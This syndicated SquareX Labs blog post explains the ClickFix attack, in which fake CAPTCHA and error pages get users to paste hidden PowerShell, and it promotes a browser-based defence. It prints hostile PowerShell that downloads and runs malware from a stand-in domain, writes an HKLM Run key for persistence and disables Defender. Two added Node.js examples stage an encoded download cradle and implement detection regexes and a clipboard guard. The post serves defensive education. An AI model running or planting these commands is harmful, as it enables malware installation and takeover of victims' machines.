National Cyber Warfare Foundation (NCWF)

ClickFix: Social Engineering That Bypasses EDRs, SWGs and Humans


2025-03-28 17:43:05
milo
Blue Team (CND)

When security teams first spotted ClickFix in early 2024, few predicted it would last long in the threat landscape. Yet here we are in 2025, watching this simple attack continue its devastating march through organizations worldwide.


Today, attackers do not need intricate exploits to get a foothold in an enterprise network. ClickFix is a prominent example of plain social engineering that slips past the usual controls, because no attachment is delivered and no exploit is fired: the victim runs the attacker's command by hand. That CAPTCHA verification you have completed countless times? That troubleshooting wizard that appears when something is not working quite right? ClickFix has turned these familiar, routine interactions into weapons.


What makes it so effective is that victims aren’t being careless — they’re trying to be responsible. They’re following what appears to be standard procedure, doing what they believe is maintaining security, not compromising it. And therein lies the cruel irony of ClickFix: our best intentions have become our greatest vulnerability.


What is ClickFix?


ClickFix is a social engineering attack that deceives users into executing malicious commands on their own devices. Unlike traditional malware delivery, which requires the victim to download and run an executable file, ClickFix has the web page place a command on the clipboard and then talks the victim through pasting and running it in a built-in Windows utility such as the Run dialog or a PowerShell window.


The attack typically begins with a convincing interface impersonation that presents users with a seemingly legitimate reason to take action, such as:



  • Fixing a browser error

  • Proving they are human via a verification process

  • Registering their device to access protected content

  • Troubleshooting audio/video connectivity issues


These deceptive interfaces then guide users through specific keyboard sequences (typically Windows+R followed by Ctrl+V and Enter, or launching PowerShell as administrator followed by Ctrl+V and Enter) that execute malicious code that has been silently copied to their clipboard.


Evolution of ClickFix Attacks


The ClickFix attack has evolved rapidly since its first appearance, with each iteration becoming more sophisticated and harder to detect.


Phase 1: CAPTCHA Verification


The earliest documented ClickFix campaigns primarily used fake CAPTCHA verification interfaces. These deceptive prompts claimed users needed to verify they were human by pressing Windows+R, then pasting pre-copied code (using Ctrl+V) and pressing Enter. This approach was effective because CAPTCHA challenges are ubiquitous across the web, and users are conditioned to follow verification steps without question.



Phase 2: Basic Browser Error


In the second phase attackers primarily used simple browser error messages with basic styling. These fake error messages typically claimed that a webpage could not be displayed correctly, then instructed users to open PowerShell as administrator and right-click in the terminal window to paste the copied code (right-click pastes the clipboard in the PowerShell console).



Phase 3: Email Attachment Campaigns


The third phase involved malicious attachments in phishing emails, disguised as documents, invoices, or reports. When opened, these attachments displayed convincing error messages claiming the document required “registration,” directing users to execute PowerShell commands to view the supposed content.




Phase 4: Application-Specific UI Impersonation


The most recent and sophisticated evolution involves precise mimicry of specific application interfaces, such as:



  • Google Meet/Zoom with camera or microphone error messages

  • Document viewing platforms with authentication requirements

  • GitHub security alerts for developers




Technical Anatomy: Two Primary Attack Vectors


ClickFix attacks have evolved into two distinct technical approaches, each with its own execution flow and security implications.


Vector 1: The Windows+R Method


The most common ClickFix implementation leverages the Windows Run dialog:


User Instructions Typically Shown:



  1. Press Windows+R to open the Run dialog

  2. Press CTRL+V to paste content (pre-loaded into clipboard)

  3. Press Enter to execute


What the Copied Code Does:


When the user pastes the content into the Run dialog, they’re actually pasting a command like:


powershell -w hidden -e [Base64-encoded PowerShell command that, when decoded, typically performs malicious actions such as downloading executable files from attacker-controlled servers]

This command performs several actions:


1. Launches Hidden PowerShell: The -w hidden flag (short for -WindowStyle Hidden) starts PowerShell with no visible window. In practice the console may flash for an instant before it is hidden, which is the only visual cue the victim gets.


2. Executes Encoded Commands: The -e parameter (-EncodedCommand) indicates that what follows is the script as Base64-encoded UTF-16LE text. This hides the download cradle from anyone glancing at the Run box and from naive keyword matching on the command line, but the encoding is trivial to reverse, and PowerShell script block logging records the decoded script, so it is weak evasion against a tuned EDR.


3. Downloads Malware: When decoded, the Base64 string reveals commands that typically:



  • Create a web client object to download files from the internet

  • Download malicious executable files from attacker-controlled servers

  • Save these files to out-of-the-way locations (often C:\ProgramData or %TEMP%)

  • Execute the downloaded malware immediately


All of this happens within seconds of the user pressing Enter, with no visible windows or notifications, giving the impression that nothing has happened while the malware secretly establishes control over the system.
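The staging-and-decoding cycle described above (the clipboard string the fake CAPTCHA copies, and what it unpacks to), as an added example that is not code from the original article or from SquareX. This Node.js script builds the Run-dialog one-liner the way a ClickFix page would, then decodes and triages such a string the way a defender would. The script body, the host example.invalid, the indicator list and the function names are all my own constructed assumptions.

```javascript
// Added example (not from the original article or SquareX). Runs under Node.js.
// Demonstrates (1) how a ClickFix page stages "powershell -w hidden -e <base64>"
// for the Run dialog and (2) how to decode and triage such a string.

// PowerShell's -EncodedCommand (-e, -ec, -enc) expects Base64 of the script
// as UTF-16LE text, not UTF-8. Using the wrong encoding yields garbage.
function encodeCommand(script) {
  return Buffer.from(script, 'utf16le').toString('base64');
}

function decodeEncodedCommand(b64) {
  return Buffer.from(b64, 'base64').toString('utf16le');
}

// Constructed sample of what a fake CAPTCHA page copies to the clipboard.
// example.invalid is a reserved placeholder, not a real attacker host.
const STAGED_SCRIPT =
  '$c = New-Object System.Net.WebClient; ' +
  "$c.DownloadFile('http://example.invalid/update.exe', \"$env:ProgramData\\svchost.exe\"); " +
  'Start-Process "$env:ProgramData\\svchost.exe" -WindowStyle Hidden';
const CLIPBOARD_TEXT = 'powershell -w hidden -e ' + encodeCommand(STAGED_SCRIPT);

// Behaviours a triage script flags in the decoded script (assumed list).
const INDICATORS = [
  ['download cradle', /Net\.WebClient|DownloadFile|DownloadString|Invoke-WebRequest|Invoke-RestMethod|\biwr\b|\birm\b/i],
  ['drop location', /ProgramData|\$env:TEMP|%TEMP%|AppData/i],
  ['process launch', /Start-Process|Invoke-Expression|\biex\b/i],
];

// Parse a Run-dialog string. Handles the encoded (-e) form and a plain
// -c/-Command form; anything not starting with powershell/pwsh is reported
// as not PowerShell. Wrappers such as "cmd /c powershell ..." are not handled.
function analyzeRunDialogCommand(text) {
  const result = { isPowerShell: false, hiddenWindow: false, encoded: false, script: null, indicators: [] };
  const t = String(text).trim();
  if (!/^(powershell|pwsh)(\.exe)?\b/i.test(t)) return result;
  result.isPowerShell = true;
  result.hiddenWindow = /-w(indowstyle)?\s+hidden/i.test(t);
  const enc = t.match(/-e(c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)/i);
  if (enc) {
    result.encoded = true;
    result.script = decodeEncodedCommand(enc[2]);
  } else {
    const cmd = t.match(/-c(ommand)?\s+(.*)$/i);
    result.script = cmd ? cmd[2] : '';
  }
  for (const [name, re] of INDICATORS) {
    if (re.test(result.script)) result.indicators.push(name);
  }
  return result;
}

// Stand-alone run: print the staged string and its triage result.
console.log('clipboard:', CLIPBOARD_TEXT);
console.log(JSON.stringify(analyzeRunDialogCommand(CLIPBOARD_TEXT), null, 2));
```

The same decoder applies to the command line an EDR or Sysmon records for the spawned powershell.exe, and to the value the Run dialog leaves behind under the user's RunMRU registry key, so the triage step is identical whether the string comes from the browser or from the endpoint.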


Vector 2: The PowerShell Administrator Method


The more dangerous variant instructs users to manually launch PowerShell with elevated privileges:


User Instructions Typically Shown:



  1. Open "Windows PowerShell" with administrator privileges

  2. Paste provided code into PowerShell

  3. Press Enter to execute


What the Administrator Code Does:


When the user pastes the code into an elevated PowerShell window, they are executing commands with administrative rights, having already clicked through the UAC prompt themselves. A typical malicious payload includes:


# Persistence: a Run key under HKLM applies to every user and needs admin to write
New-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" -Name "SystemUpdate" -Value "powershell -w hidden -e [encodedPayload]" -Force

# Disable Defender real-time monitoring (silently ignored when Tamper Protection is enabled)
Set-MpPreference -DisableRealtimeMonitoring $true

# Download the next stage and run it without a window; "svchost.exe" is a decoy name
$client = New-Object System.Net.WebClient
$client.DownloadFile("http://example-malicious-domain.com/malware.exe", "C:\ProgramData\svchost.exe")
Start-Process "C:\ProgramData\svchost.exe" -WindowStyle Hidden

This administrative-level code performs significantly more dangerous actions:


1. Creates System-Level Persistence: Unlike user-level attacks, admin privileges allow the malware to:



  • Modify protected registry keys in HKLM (HKEY_LOCAL_MACHINE)

  • Create startup entries that affect all users on the system

  • Install services that run with SYSTEM privileges


2. Disables Security Protections: With admin rights, the malware can:



  • Turn off Windows Defender real-time protection (unless Tamper Protection is enabled, in which case the Set-MpPreference change is rejected)

  • Modify firewall settings to allow malicious connections


3. Installs Privileged Malware: The downloaded components:



  • Are placed in protected system locations

  • Can run with elevated privileges

  • Can access sensitive system resources

  • Often include remote access tools that give attackers complete control


This method is particularly devastating because it gives attackers full administrative control over the compromised system, allowing them to access all user accounts and data, extract credentials, pivot to other network machines, disable security controls, and establish persistence that survives reboots and security scans.


Why ClickFix Is Hard to Detect


ClickFix attacks represent a perfect storm of evasion techniques that challenge traditional security systems for multiple reasons:


1. Unmonitored Clipboard Operations



  • Security solutions typically focus on detecting malicious attachments or URLs rather than clipboard operations

  • Most endpoint protection tools have no visibility into clipboard content and no mechanism to detect malicious code being copied

  • What the endpoint does see is the downstream process: explorer.exe (the Run dialog) or the user's console spawning powershell.exe with a hidden window and an encoded command line, and the pasted text is also recorded under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU. Those two artifacts are where detection engineering for ClickFix usually starts


2. User-Initiated Privilege Escalation


The elevation is consented: the user launched PowerShell as administrator and clicked through the UAC prompt themselves, so controls that watch for unauthorized privilege escalation see nothing anomalous


3. No Initial Malicious File Download


Unlike traditional malware delivery:



  • No suspicious executable is initially downloaded that could trigger file-scanning security tools

  • The actual malicious payload is downloaded and executed only after the initial code execution


4. Abuse of Trusted Services


Modern ClickFix variants leverage trusted platforms to deliver secondary payloads:



  • Downloads from Microsoft SharePoint, Google Drive, or GitHub bypass URL reputation filters

  • Traffic to cloud storage services is typically allowed through firewalls


The Solution: Browser Detection and Response


The browser is a complex application, akin to an operating system on its own. Attackers are exploiting various aspects of the browser and orchestrating attacks that render entirely on the client side. Existing security solutions like Secure Web Gateways as part of SASE/SSE solutions are unable to protect users against modern web threats that happen on the client side, and endpoint security solutions have no visibility into what happens in the browser during an attack.


Defense against ClickFix attacks:


1. Stopping Attacks at the Source



  • Browser-based solutions can detect and block malicious clipboard operations at their origin, preventing the attack chain from beginning

  • Browser security can detect when JavaScript attempts to programmatically manipulate clipboard content with suspicious commands


2. Contextual Awareness and UI Analysis



  • Browser security solutions can detect fake interfaces mimicking legitimate services (like Google Meet or Zoom)

  • Advanced solutions can identify when a Google Meet UI is improperly hosted on an unusual domain like Google Sites

  • Visual analysis can detect UI inconsistencies that might fool humans but can be algorithmically identified
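A browser-side version of the first defense above, added here as an example and not SquareX's code: a guard that wraps the two ways a page can write to the clipboard (navigator.clipboard.writeText, and DataTransfer.setData inside a copy handler followed by document.execCommand("copy")) and refuses writes that look like a PowerShell one-liner. It assumes it is injected into the page's main JavaScript world before the page's own scripts run (an extension content script lives in an isolated world and would have to inject it). The detection regex, the function names and the fake window at the bottom are my own constructed assumptions; the fake window exists so the file also runs under Node.js without a browser.

```javascript
// Added example (not from the original article or SquareX). Installs a
// clipboard-write guard on a window object; the fake window at the bottom
// lets it run under Node.js without a browser.

// Cheap first-pass check for a ClickFix-style one-liner: mentions PowerShell
// and either hides its window, carries an encoded command, or downloads.
function looksLikeClickFix(text) {
  const t = String(text);
  return /\bpowershell(\.exe)?\b|\bpwsh\b/i.test(t) &&
    /-w(indowstyle)?\s+hidden|-e(c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}|DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b|\birm\b/i.test(t);
}

// Wraps both clipboard-write paths on `win`. Returns the list of blocked writes
// so a content script can report them. `isSuspicious` can be swapped for a
// fuller analyzer that decodes the -e payload.
function installClipboardGuard(win, isSuspicious = looksLikeClickFix) {
  const blocked = [];
  const block = (source, text) => blocked.push({ source, text: String(text).slice(0, 200) });

  // Path 1: async Clipboard API, navigator.clipboard.writeText(text).
  const clip = win.navigator && win.navigator.clipboard;
  if (clip && typeof clip.writeText === 'function') {
    const origWriteText = clip.writeText.bind(clip);
    clip.writeText = function (text) {
      if (isSuspicious(text)) {
        block('navigator.clipboard.writeText', text);
        return Promise.reject(new Error('clipboard write blocked'));
      }
      return origWriteText(text);
    };
  }

  // Path 2: legacy copy handler. The page listens for "copy", calls
  // event.clipboardData.setData(...) plus preventDefault(), then fires
  // document.execCommand("copy"). Hooking DataTransfer.prototype.setData
  // catches that no matter which element or listener does it.
  const DT = win.DataTransfer;
  if (DT && DT.prototype && typeof DT.prototype.setData === 'function') {
    const origSetData = DT.prototype.setData;
    DT.prototype.setData = function (format, data) {
      if (isSuspicious(data)) {
        block('DataTransfer.setData', data);
        return; // nothing is staged, so the user's later Ctrl+V pastes nothing useful
      }
      return origSetData.call(this, format, data);
    };
  }
  return { blocked };
}

// Constructed stand-in for a browser window so the guard can be exercised here.
function makeFakeWindow() {
  const written = [];
  class FakeDataTransfer { setData(format, data) { written.push([format, data]); } }
  return {
    written,
    navigator: { clipboard: { writeText: async (text) => { written.push(['text/plain', text]); } } },
    DataTransfer: FakeDataTransfer,
  };
}

// Run the guard against a hostile and a benign write. The Base64 fragment is
// constructed and decodes (UTF-16LE) to the start of "IEX (New-Object".
function demo() {
  const win = makeFakeWindow();
  const guard = installClipboardGuard(win);
  const hostile = 'powershell -w hidden -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA';
  win.navigator.clipboard.writeText(hostile).catch(() => {}); // rejected, nothing written
  new win.DataTransfer().setData('text/plain', hostile);       // dropped
  new win.DataTransfer().setData('text/plain', 'hello world'); // passes through
  return { blocked: guard.blocked.map((b) => b.source), written: win.written.map((w) => w[1]) };
}

console.log(JSON.stringify(demo()));
```

Limits worth knowing: a page that saved a reference to the original writeText or setData before the guard ran keeps the unhooked version, and prototype patching is easy for page script to detect, so this is a detection aid rather than a hard boundary. The endpoint-side control, alerting on or blocking powershell.exe launched with an encoded, hidden-window command line from the Run dialog, should stay in place behind it.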


SquareX’s Browser Detection and Response (BDR) provides protection against increasingly sophisticated ClickFix attacks. Deployed as a lightweight browser extension, SquareX applies security directly where the attack occurs, in the browser itself. SquareX can block the copying of malicious PowerShell commands that trick users into compromising their own systems, and it detects and prevents interface mimicry attempts that impersonate trusted applications like Zoom and Google Meet.


By operating directly within the browser, where traditional security tools remain blind, SquareX creates an essential shield against such attacks, stopping them at their source before anyone in your organization unwittingly becomes the weak link in your security chain.


#webattacks #powershell #cybersecurity | Dakshitaa B.








ClickFix: Social Engineering That Bypasses EDRs, SWGs and Humans was originally published in SquareX Labs on Medium, where people are continuing the conversation by highlighting and responding to this story.


The post ClickFix: Social Engineering That Bypasses EDRs, SWGs and Humans appeared first on Security Boulevard.



Engineering @ SquareX

Source: Security Boulevard
Source Link: https://securityboulevard.com/2025/03/clickfix-social-engineering-that-bypasses-edrs-swgs-and-humans/?utm_source=rss&utm_medium=rss&utm_campaign=clickfix-social-engineering-that-bypasses-edrs-swgs-and-humans





Copyright 2012 through 2025 - National Cyber Warfare Foundation - All rights reserved worldwide.